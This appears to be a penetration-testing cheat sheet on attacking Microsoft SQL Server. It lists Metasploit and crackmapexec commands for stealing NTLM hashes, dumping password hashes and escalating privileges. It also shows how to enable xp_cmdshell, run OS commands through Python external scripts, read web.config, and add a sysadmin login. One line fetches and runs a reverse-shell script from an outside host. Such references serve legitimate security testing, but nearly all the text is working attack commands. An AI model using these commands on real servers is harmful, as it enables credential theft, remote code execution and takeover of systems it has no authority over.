1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
Search for exploits/scripts/auxiliary modules that can be helpful to find vulnerabilities in this kind of service:
searchsploit"microsoft sql server"nmap--script-help"*ms* and *sql*"msf> searchmssql
Information
Default MS-SQL System Tables
master Database : Records all the system-level information for an instance of SQL Server.
msdb Database : Is used by SQL Server Agent for scheduling alerts and jobs.
model Database : Is used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards.
Resource Database : Is a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.
tempdb Database : Is a work-space for holding temporary objects or intermediate result sets.
If you don'thave credentials you can try to guess them. You can use nmap or metasploit. Be careful, you can block accounts if you fail login several times using an existing username.
Metasploit
#Set USERNAME, RHOSTS and PASSWORD#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used#Steal NTLMmsf> useauxiliary/admin/mssql/mssql_ntlm_stealer#Steal NTLM hash, before executing run Responder#Info gatheringmsf> useadmin/mssql/mssql_enum#Security checksmsf> useadmin/mssql/mssql_enum_domain_accountsmsf> useadmin/mssql/mssql_enum_sql_loginsmsf> useauxiliary/admin/mssql/mssql_findandsampledatamsf> useauxiliary/scanner/mssql/mssql_hashdumpmsf> useauxiliary/scanner/mssql/mssql_schemadump#Search for insteresting datamsf> useauxiliary/admin/mssql/mssql_findandsampledatamsf> useauxiliary/admin/mssql/mssql_idf#Privescmsf> useexploit/windows/mssql/mssql_linkcrawlermsf> useadmin/mssql/mssql_escalate_execute_as#If the user has IMPERSONATION privilege, this will try to escalatemsf> useadmin/mssql/mssql_escalate_dbowner#Escalate from db_owner to sysadmin#Code executionmsf> useadmin/mssql/mssql_exec#Execute commandsmsf> useexploit/windows/mssql/mssql_payload#Uploads and execute a payload#Add new admin user from meterpreter sessionmsf> usewindows/manage/mssql_local_auth_bypass
#Username + Password + CMD commandcrackmapexecmssql-d<Domainname>-u<username>-p<password>-x"whoami"#Username + Hash + PS commandcrackmapexecmssql-d<Domainname>-u<username>-H<HASH>-X'$PSVersionTable'#this turns on advanced options and is needed to configure xp_cmdshellsp_configure'show advanced options','1'RECONFIGURE#this enables xp_cmdshellsp_configure'xp_cmdshell','1'RECONFIGURE# Quickly check what the service account is via xp_cmdshellEXECmaster..xp_cmdshell'whoami'
****Read this postto find more information about how to abuse this feature
Read files executing scripts (Python and R)
MSSQL could allow you to execute scripts in Python and/or R. These code will be executed by a different user than the one using xp_cmdshell to execute commands.
Example trying to execute a 'R'"Hellow World!"not working:
Example using configured python to perform several actions:
#Print the user being used (andexecute commands)EXECUTE sp_execute_external_script @language =N'Python', @script =N'print(__import__("getpass").getuser())'EXECUTE sp_execute_external_script @language =N'Python', @script =N'print(__import__("os").system("whoami"))'#Openandread a fileEXECUTE sp_execute_external_script @language =N'Python', @script =N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'#MultilineEXECUTE sp_execute_external_script @language =N'Python', @script = N'import sysprint(sys.version)'GO
You can login into the service using impacket mssqlclient.py
mssqlclient.py-dbvolume-windows-auth<DOMAIN>/<USERNAME>:<PASSWORD>@<IP>#Recommended -windows-auth when you are going to use a domain. use as domain the netBIOS name of the machine#Once logged in you can run queries:SQL> select@@version;#Steal NTLM hashsudoresponder-I<interface>#Run that in other consoleSQL> execmaster..xp_dirtree'\\<YOUR_RESPONDER_IP>\test'#Steal the NTLM hash, crack it with john or hashcat#Try to enable code executionSQL> enable_xp_cmdshell#Execute code, 2 sintax, for complex and non complex cmdsSQL> xp_cmdshellwhoami/allSQL> EXECxp_cmdshell'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'
sqsh
sqsh-S<IP>-U<Username>-P<Password>-D<Database>
Manual
SELECTnameFROM master.dbo.sysdatabases #Get databasesSELECT*FROM<databaseName>.INFORMATION_SCHEMA.TABLES; #Gettable names#List Linked ServersEXEC sp_linkedserversSELECT*FROM sys.servers;#List usersselect sp.name aslogin, sp.type_desc aslogin_type, sl.password_hash, sp.create_date, sp.modify_date, casewhen sp.is_disabled =1then'Disabled'else'Enabled'endasstatusfrom sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type notin ('G', 'R') order by sp.name;#Create user with sysadmin privsCREATELOGIN hacker WITHPASSWORD='P@ssword123!'sp_addsrvrolemember 'hacker', 'sysadmin'
Post Explotation
The user running MSSQL server will have enabled the privilege token SeImpersonatePrivilege.
You probably will be able to escalate to Administrator using this token: Juicy-potato